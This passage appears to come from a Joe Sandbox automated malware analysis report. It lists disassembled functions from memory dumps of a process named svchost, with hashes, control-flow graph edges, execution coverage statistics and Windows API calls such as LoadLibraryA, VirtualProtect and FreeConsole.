                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 771614528-0
                                                                                                                                                                                                                                                    • Opcode ID: 83b3ad090c49cb9c70e04bc7b10a7809ecae7306a5350dedb5ccf247260380e0
                                                                                                                                                                                                                                                    • Instruction ID: bbf762050bce9c1dca8712382451508ee2dbf6700b378d32d6b4e27e2dbfae73
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83b3ad090c49cb9c70e04bc7b10a7809ecae7306a5350dedb5ccf247260380e0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C31937090CB488FDB29DFA8D8497EABBF0EB55321F00426FD089C3192DB74A455CB51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C1A91269 Relevance: .2, Instructions: 218COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000F.00000002.1527028462.00007FF7C1A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1A90000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7c1a90000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 8db72b8b5c3f5fe7d5d72cf392d1832fa6b7de7f0c9776f11809368073091a55
                                                                                                                                                                                                                                                    • Instruction ID: ffb9a928e9f8a1f914ab90ebbde95a6fc023efffa92663cac4d7dc479ac1cf2e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8db72b8b5c3f5fe7d5d72cf392d1832fa6b7de7f0c9776f11809368073091a55
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D61373050DBC94FDB46EF248C659A9BBF0EF5A324B4900FBD44ACB193CE68A845C391
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C1A913B0 Relevance: .1, Instructions: 80COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000F.00000002.1527028462.00007FF7C1A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1A90000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7c1a90000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: d4023085bdf6f550ae5bd4095bbb4848ff839268d5ad67143f4c8892b3ee29ca
                                                                                                                                                                                                                                                    • Instruction ID: fac63f06813a1179079d5619bc42d1d65ffbb4b40282fbe1b31b6e5a0f1530f3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4023085bdf6f550ae5bd4095bbb4848ff839268d5ad67143f4c8892b3ee29ca
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A21D431508A0D8FDB48EF14C8949B9B7E1FFA9318B51467ED00BC728ACE75E852CB90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:12.1%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                    Total number of Nodes:10
                                                                                                                                                                                                                                                    Total number of Limit Nodes:0
                                                                                                                                                                                                                                                    execution_graph 13223 7ff7c1980a58 13224 7ff7c1980a61 FreeConsole 13223->13224 13226 7ff7c1980afe 13224->13226 13219 7ff7c1982d84 13220 7ff7c1982d8d VirtualProtect 13219->13220 13222 7ff7c1982e51 13220->13222 13227 7ff7c1982861 13230 7ff7c1982874 13227->13230 13228 7ff7c1982930 LoadLibraryA 13229 7ff7c1982984 13228->13229 13230->13228 13230->13230

                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                    Function 00007FF7C1A60D71 Relevance: 1.2, Instructions: 1189COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1491 7ff7c1a60d71-7ff7c1a60df6 1495 7ff7c1a60df7-7ff7c1a60e13 1491->1495 1497 7ff7c1a60e56-7ff7c1a60e68 1495->1497 1498 7ff7c1a60e15-7ff7c1a60e26 1495->1498 1497->1495 1499 7ff7c1a60e6a-7ff7c1a60ecf 1497->1499 1502 7ff7c1a61027-7ff7c1a61036 1499->1502 1503 7ff7c1a60ed5-7ff7c1a60ee8 1499->1503 1507 7ff7c1a61038-7ff7c1a61039 1502->1507 1503->1502 1504 7ff7c1a60eee-7ff7c1a60f1a 1503->1504 1504->1502 1505 7ff7c1a60f20-7ff7c1a60f33 1504->1505 1511 7ff7c1a60fa4-7ff7c1a60fb6 1505->1511 1512 7ff7c1a60f35-7ff7c1a60f36 1505->1512 1509 7ff7c1a6103c-7ff7c1a6105a 1507->1509 1510 7ff7c1a6103b 1507->1510 1513 7ff7c1a6105b-7ff7c1a61067 1509->1513 1510->1509 1511->1502 1516 7ff7c1a60fb8-7ff7c1a60fea 1511->1516 1514 7ff7c1a60efc-7ff7c1a60f00 1512->1514 1515 7ff7c1a60f38-7ff7c1a60f3a 1512->1515 1517 7ff7c1a6106b-7ff7c1a61097 1513->1517 1521 7ff7c1a60f03-7ff7c1a60f1a 1514->1521 1522 7ff7c1a60f02 1514->1522 1524 7ff7c1a60f3c-7ff7c1a60f45 1515->1524 1525 7ff7c1a60f81 1515->1525 1516->1513 1536 7ff7c1a60fec-7ff7c1a60fef 1516->1536 1519 7ff7c1a610cc-7ff7c1a610e4 1517->1519 1520 7ff7c1a61099-7ff7c1a610b0 1517->1520 1527 7ff7c1a610b2-7ff7c1a610ca 1520->1527 1528 7ff7c1a61121-7ff7c1a61157 1520->1528 1521->1502 1521->1505 1522->1521 1533 7ff7c1a60f47-7ff7c1a60f65 1524->1533 1534 7ff7c1a60f66-7ff7c1a60f7e 1524->1534 1525->1502 1535 7ff7c1a60f87-7ff7c1a60fa2 1525->1535 1527->1519 1538 7ff7c1a6118c-7ff7c1a611a4 1528->1538 1539 7ff7c1a61159-7ff7c1a61170 1528->1539 1533->1502 1544 7ff7c1a60f6b-7ff7c1a60f7e 1533->1544 1534->1525 1535->1511 1536->1517 1541 7ff7c1a60ff1 1536->1541 1542 7ff7c1a61172-7ff7c1a6118a 1539->1542 1543 7ff7c1a611e1-7ff7c1a61230 1539->1543 1541->1507 1546 7ff7c1a60ff3-7ff7c1a61026 1541->1546 1542->1538 1554 7ff7c1a61232-7ff7c1a61235 1543->1554 1555 7ff7c1a612a1-7ff7c1a612a8 1543->1555 1544->1525 1556 7ff7c1a61237-7ff7c1a61264 1554->1556 1555->1556 1557 7ff7c1a612aa-7ff7c1a612e9 1555->1557 1561 7ff7c1a612eb-7ff7c1a612fb 1557->1561 1562 7ff7c1a612fd-7ff7c1a612fe 1557->1562 1563 7ff7c1a61301-7ff7c1a61318 1561->1563 1562->1563 1567 7ff7c1a6134b-7ff7c1a613c9 1563->1567 1568 7ff7c1a6131a-7ff7c1a6131c 1563->1568 1574 7ff7c1a613cb-7ff7c1a613f9 1567->1574 1575 7ff7c1a61413-7ff7c1a61444 1567->1575 1568->1567 1569 7ff7c1a6131e-7ff7c1a61344 1568->1569 1569->1567 1578 7ff7c1a614a5-7ff7c1a614b5 1574->1578 1579 7ff7c1a613ff-7ff7c1a61412 1574->1579 1577 7ff7c1a61446-7ff7c1a61462 1575->1577 1575->1578 1577->1578 1584 7ff7c1a614b8-7ff7c1a61508 1578->1584 1585 7ff7c1a614b7 1578->1585 1579->1578 1580 7ff7c1a61418-7ff7c1a61444 1579->1580 1580->1577 1580->1578 1588 7ff7c1a6150a-7ff7c1a61517 1584->1588 1589 7ff7c1a6151f-7ff7c1a61530 1584->1589 1585->1584 1590 7ff7c1a6154c-7ff7c1a61564 1588->1590 1591 7ff7c1a61519-7ff7c1a6151d 1588->1591 1592 7ff7c1a61532-7ff7c1a61535 1589->1592 1593 7ff7c1a615a1-7ff7c1a615a8 1589->1593 1591->1589 1594 7ff7c1a61537-7ff7c1a6154a 1592->1594 1593->1594 1596 7ff7c1a615aa-7ff7c1a615c5 1593->1596 1594->1590 1598 7ff7c1a615c7-7ff7c1a615ea 1596->1598 1599 7ff7c1a615c6 1596->1599 1601 7ff7c1a615ec-7ff7c1a615ee 1598->1601 1602 7ff7c1a6165b-7ff7c1a61668 1598->1602 1599->1598 1603 7ff7c1a6166a-7ff7c1a616f6 1601->1603 1604 7ff7c1a615f0-7ff7c1a61618 1601->1604 1602->1603 1617 7ff7c1a616f8-7ff7c1a61706 1603->1617 1618 7ff7c1a61766-7ff7c1a61778 1603->1618 1611 7ff7c1a6162c-7ff7c1a61639 1604->1611 1612 7ff7c1a6161a-7ff7c1a6162b 1604->1612 1612->1611 1619 7ff7c1a61707-7ff7c1a61713 1617->1619 1618->1619 1620 7ff7c1a6177a-7ff7c1a617a9 1618->1620 1624 7ff7c1a61727-7ff7c1a61731 1619->1624 1625 7ff7c1a61715-7ff7c1a61726 1619->1625 1626 7ff7c1a617ab-7ff7c1a617d9 1620->1626 1627 7ff7c1a617f3-7ff7c1a61824 1620->1627 1625->1624 1629 7ff7c1a61893-7ff7c1a618a5 1626->1629 1630 7ff7c1a617df-7ff7c1a617f2 1626->1630 1627->1629 1631 7ff7c1a61826-7ff7c1a61840 1627->1631 1636 7ff7c1a618a8-7ff7c1a61920 1629->1636 1637 7ff7c1a618a7 1629->1637 1630->1627 1630->1629 1631->1629 1640 7ff7c1a61934-7ff7c1a6194f 1636->1640 1641 7ff7c1a61922-7ff7c1a61926 1636->1641 1637->1636 1642 7ff7c1a6192b-7ff7c1a61930 1641->1642 1642->1642 1643 7ff7c1a61932-7ff7c1a61933 1642->1643 1643->1640
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.1475323455.00007FF7C1A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1A60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff7c1a60000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: ca411a0a115d253f64ba79bf732a8e732d6483a235dcf0caafc336b17828cfb6
                                                                                                                                                                                                                                                    • Instruction ID: d70a9b9340013053b9ec010d0e35f00e1b6ca48902ecaac3137466440cfb8956
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca411a0a115d253f64ba79bf732a8e732d6483a235dcf0caafc336b17828cfb6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E82067190DBC94FD756EB3888659A8BFE0EF97320B4901FFC089CB0A3D9685846C791
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C1A6026B Relevance: 2.3, Strings: 1, Instructions: 1041COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 0 7ff7c1a6026b-7ff7c1a6026d 1 7ff7c1a6026e-7ff7c1a6027c 0->1 2 7ff7c1a603b1-7ff7c1a603b7 0->2 4 7ff7c1a60284-7ff7c1a60286 1->4 5 7ff7c1a603b9-7ff7c1a603c8 2->5 6 7ff7c1a60288-7ff7c1a60289 4->6 7 7ff7c1a602f7-7ff7c1a60306 4->7 9 7ff7c1a603c9-7ff7c1a60427 5->9 10 7ff7c1a6028b 6->10 11 7ff7c1a6024f-7ff7c1a6026a 6->11 8 7ff7c1a60307-7ff7c1a60309 7->8 8->2 12 7ff7c1a6030a-7ff7c1a60348 8->12 13 7ff7c1a6045c-7ff7c1a60474 9->13 14 7ff7c1a60429-7ff7c1a60440 9->14 10->8 15 7ff7c1a6028d 10->15 11->0 12->5 36 7ff7c1a6034a-7ff7c1a6034d 12->36 17 7ff7c1a60442-7ff7c1a60445 14->17 18 7ff7c1a604b1-7ff7c1a604b8 14->18 20 7ff7c1a602d4 15->20 21 7ff7c1a6028f-7ff7c1a602a0 15->21 25 7ff7c1a60447-7ff7c1a6045a 17->25 18->25 26 7ff7c1a604ba-7ff7c1a604d0 18->26 20->2 22 7ff7c1a602da-7ff7c1a602f5 20->22 30 7ff7c1a60236-7ff7c1a6024e 21->30 31 7ff7c1a602a2-7ff7c1a602b8 21->31 22->7 25->13 29 7ff7c1a604d1-7ff7c1a604d5 25->29 26->29 33 7ff7c1a604d7-7ff7c1a604e7 29->33 34 7ff7c1a604d6 29->34 30->11 31->2 35 7ff7c1a602be-7ff7c1a602d1 31->35 37 7ff7c1a6051c-7ff7c1a60534 33->37 38 7ff7c1a604e9-7ff7c1a60500 33->38 34->33 35->20 36->9 42 7ff7c1a6034f 36->42 39 7ff7c1a60502-7ff7c1a60505 38->39 40 7ff7c1a60571-7ff7c1a60578 38->40 43 7ff7c1a60507-7ff7c1a6051a 39->43 40->43 44 7ff7c1a6057a-7ff7c1a60590 40->44 45 7ff7c1a60396-7ff7c1a603b0 42->45 46 7ff7c1a60351-7ff7c1a6035f 42->46 43->37 48 7ff7c1a60597-7ff7c1a605a7 44->48 49 7ff7c1a60592-7ff7c1a60596 44->49 46->45 51 7ff7c1a605dc-7ff7c1a605f4 48->51 52 7ff7c1a605a9-7ff7c1a605c0 48->52 49->48 54 7ff7c1a605c2-7ff7c1a605c5 52->54 55 7ff7c1a60631-7ff7c1a60638 52->55 57 7ff7c1a605c7-7ff7c1a605da 54->57 55->57 58 7ff7c1a6063a-7ff7c1a60668 55->58 57->51 59 7ff7c1a6069d-7ff7c1a606a8 58->59 60 7ff7c1a6066a-7ff7c1a6067a 58->60 67 7ff7c1a606bc-7ff7c1a606c5 59->67 68 7ff7c1a606aa-7ff7c1a606b9 59->68 62 7ff7c1a6067c-7ff7c1a6067e 60->62 63 7ff7c1a606eb-7ff7c1a606f8 60->63 65 7ff7c1a606fa-7ff7c1a60708 62->65 66 7ff7c1a60680 62->66 63->65 72 7ff7c1a60697-7ff7c1a6069c 65->72 73 7ff7c1a6070a-7ff7c1a6073c 65->73 69 7ff7c1a606c6-7ff7c1a606c7 66->69 70 7ff7c1a60682-7ff7c1a60696 66->70 67->69 68->67 70->72 72->59 74 7ff7c1a6073e-7ff7c1a60772 73->74 75 7ff7c1a60786-7ff7c1a6078b 73->75 77 7ff7c1a60778-7ff7c1a60785 74->77 78 7ff7c1a60a42-7ff7c1a60a56 74->78 75->78 79 7ff7c1a6078c-7ff7c1a6079e 75->79 77->75 83 7ff7c1a60a57-7ff7c1a60a90 78->83 80 7ff7c1a6079f-7ff7c1a607bd 79->80 80->78 82 7ff7c1a607c3-7ff7c1a607d6 80->82 88 7ff7c1a607d8-7ff7c1a607d9 82->88 89 7ff7c1a60847-7ff7c1a60856 82->89 84 7ff7c1a60a1f 83->84 85 7ff7c1a60a92-7ff7c1a60ab7 83->85 84->78 92 7ff7c1a60aec-7ff7c1a60b04 85->92 93 7ff7c1a60ab9-7ff7c1a60ad0 85->93 88->80 91 7ff7c1a607db 88->91 90 7ff7c1a60857-7ff7c1a60859 89->90 90->78 95 7ff7c1a6085a-7ff7c1a60872 90->95 91->90 96 7ff7c1a607dd 91->96 97 7ff7c1a60ad2-7ff7c1a60aeb 93->97 98 7ff7c1a60b41-7ff7c1a60b77 93->98 111 7ff7c1a60874-7ff7c1a60877 95->111 112 7ff7c1a608e3-7ff7c1a608f0 95->112 101 7ff7c1a60824 96->101 102 7ff7c1a607df-7ff7c1a607f0 96->102 97->92 99 7ff7c1a60bac-7ff7c1a60bc4 98->99 100 7ff7c1a60b79-7ff7c1a60b90 98->100 106 7ff7c1a60b92-7ff7c1a60bab 100->106 107 7ff7c1a60c01-7ff7c1a60c37 100->107 101->78 104 7ff7c1a6082a-7ff7c1a60845 101->104 102->75 116 7ff7c1a607f2-7ff7c1a60808 102->116 104->89 106->99 113 7ff7c1a60c6c-7ff7c1a60c84 107->113 114 7ff7c1a60c39-7ff7c1a60c50 107->114 117 7ff7c1a60879 111->117 118 7ff7c1a608f3 111->118 112->118 119 7ff7c1a60c52-7ff7c1a60c55 114->119 120 7ff7c1a60cc1-7ff7c1a60cc8 114->120 116->78 123 7ff7c1a6080e-7ff7c1a60821 116->123 126 7ff7c1a6087b-7ff7c1a608a2 117->126 127 7ff7c1a608c0 117->127 118->78 125 7ff7c1a608f9-7ff7c1a6090c 118->125 128 7ff7c1a60c57-7ff7c1a60c6a 119->128 120->128 129 7ff7c1a60cca-7ff7c1a60cfe 120->129 123->101 137 7ff7c1a6090e-7ff7c1a60912 125->137 138 7ff7c1a6097d-7ff7c1a60990 125->138 126->78 136 7ff7c1a608a8-7ff7c1a608be 126->136 132 7ff7c1a608c3-7ff7c1a608e1 127->132 133 7ff7c1a608c2 127->133 128->113 132->112 133->132 136->78 136->127 139 7ff7c1a60914 137->139 140 7ff7c1a60993 137->140 138->140 141 7ff7c1a60974-7ff7c1a6097a 139->141 140->78 142 7ff7c1a60999-7ff7c1a609b5 140->142 141->138 145 7ff7c1a609b7-7ff7c1a609cc 142->145 146 7ff7c1a609d2-7ff7c1a609e6 142->146 145->146 146->83 147 7ff7c1a609e8-7ff7c1a609ed 146->147 147->141 149 7ff7c1a609ef 147->149 149->84
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.1475323455.00007FF7C1A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1A60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff7c1a60000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: A
                                                                                                                                                                                                                                                    • API String ID: 0-3554254475
                                                                                                                                                                                                                                                    • Opcode ID: 657ead17d1dcb1b262bc1807c5cce7e5c9091c3695a823820c52ff0dd01b375c
                                                                                                                                                                                                                                                    • Instruction ID: 92553aa129737bedba5fdb37054c15c78b9af032064b38476d7553957a22bf7b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 657ead17d1dcb1b262bc1807c5cce7e5c9091c3695a823820c52ff0dd01b375c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92625AB180D7898FD756EF288855AACBBE0FF56310F5505FFC089CB093DA64A886C791
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C1982861 Relevance: 1.6, APIs: 1, Instructions: 141libraryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1098 7ff7c1982861-7ff7c19828ac 1101 7ff7c19828ae-7ff7c19828d5 1098->1101 1102 7ff7c198291f-7ff7c1982982 LoadLibraryA 1098->1102 1101->1102 1107 7ff7c19828d7-7ff7c19828da 1101->1107 1105 7ff7c198298a-7ff7c19829b7 call 7ff7c19829da 1102->1105 1106 7ff7c1982984 1102->1106 1106->1105 1109 7ff7c19828dc-7ff7c19828ef 1107->1109 1110 7ff7c1982914-7ff7c198291c 1107->1110 1111 7ff7c19828f3-7ff7c1982906 1109->1111 1112 7ff7c19828f1 1109->1112 1110->1102 1111->1111 1114 7ff7c1982908-7ff7c1982910 1111->1114 1112->1111 1114->1110
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.1474332610.00007FF7C1980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff7c1980000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                                                                                                                    • Opcode ID: 4289c6671cf20d7bdad6ac8137c048253df1c14f7de4afeb8fbf08a3da9b0d2b
                                                                                                                                                                                                                                                    • Instruction ID: adf587b38c3867cdceac55d078430200f1c5df5cf482919197e6c0dc76d489fd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4289c6671cf20d7bdad6ac8137c048253df1c14f7de4afeb8fbf08a3da9b0d2b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2415130504A4D8FEB98EF18C8557A977E1FB58315F10423EE80EC7691DB75E881CB81
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C1982D84 Relevance: 1.6, APIs: 1, Instructions: 126memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1115 7ff7c1982d84-7ff7c1982d8b 1116 7ff7c1982d8d-7ff7c1982d95 1115->1116 1117 7ff7c1982d96-7ff7c1982e4f VirtualProtect 1115->1117 1116->1117 1120 7ff7c1982e57-7ff7c1982e7f 1117->1120 1121 7ff7c1982e51 1117->1121 1121->1120
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.1474332610.00007FF7C1980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff7c1980000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                    • Opcode ID: 9c27d3e3c493ee68a26ce337e39af8eaeb41a8f24c73c1255a5aac16286bad0b
                                                                                                                                                                                                                                                    • Instruction ID: 608f924e45be1aa83fd1c54bc9e9c166709f0b9506aa9e2a2261209634140d35
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c27d3e3c493ee68a26ce337e39af8eaeb41a8f24c73c1255a5aac16286bad0b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D31F63090CA488FDB08EFA898466F9BBE1FF56321F04426FD049C3292CB746856CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C1980A58 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1122 7ff7c1980a58-7ff7c1980a5f 1123 7ff7c1980a6a-7ff7c1980afc FreeConsole 1122->1123 1124 7ff7c1980a61-7ff7c1980a69 1122->1124 1127 7ff7c1980afe 1123->1127 1128 7ff7c1980b04-7ff7c1980b2b 1123->1128 1124->1123 1127->1128
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.1474332610.00007FF7C1980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff7c1980000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConsoleFree
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 771614528-0
                                                                                                                                                                                                                                                    • Opcode ID: d0494c064ac7b7db4887a69074a85709dbf8385b085b8582087e742116bc84fc
                                                                                                                                                                                                                                                    • Instruction ID: 8a43408b9c8f87ab774281946ea47501500340a6df610136cbc35c5409fd53f2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0494c064ac7b7db4887a69074a85709dbf8385b085b8582087e742116bc84fc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E131937090CB488FEB19EF68D8497EABBE0EF56321F04426FD089C3592DA74A455CB51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C1A61269 Relevance: .2, Instructions: 222COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.1475323455.00007FF7C1A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1A60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff7c1a60000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 33b5f0f7e9cf2d69311d5697b4386ebe9f4b13c8db2da11b2cfcda6f101a60a0
                                                                                                                                                                                                                                                    • Instruction ID: 9867afee1a5ebaf3087ff54d89218ab16439fd6a3e21cf2f1fcfdce90957bdd6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33b5f0f7e9cf2d69311d5697b4386ebe9f4b13c8db2da11b2cfcda6f101a60a0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E61153150DB894FDB56EF3488699A5BFE0EF97314B0601FFC04ACB1A3DA28A805C791
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C1A613B0 Relevance: .1, Instructions: 80COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.1475323455.00007FF7C1A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1A60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff7c1a60000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7f4c6968a2b376230b9fb93bf7d32ee7f88f9287f491dc64b0cb7989bdf392ab
                                                                                                                                                                                                                                                    • Instruction ID: a9fe9fa464c6d1741da212e47c164c587f3f643fccc585f6657f976e84c83dce
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f4c6968a2b376230b9fb93bf7d32ee7f88f9287f491dc64b0cb7989bdf392ab
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1121F231908D0C8FDB48EF18C8999B9B7E1FFA9318B51066ED00BC728ACE75A851C780
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:10.7%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                    Signature Coverage:2.3%
                                                                                                                                                                                                                                                    Total number of Nodes:132
                                                                                                                                                                                                                                                    Total number of Limit Nodes:14
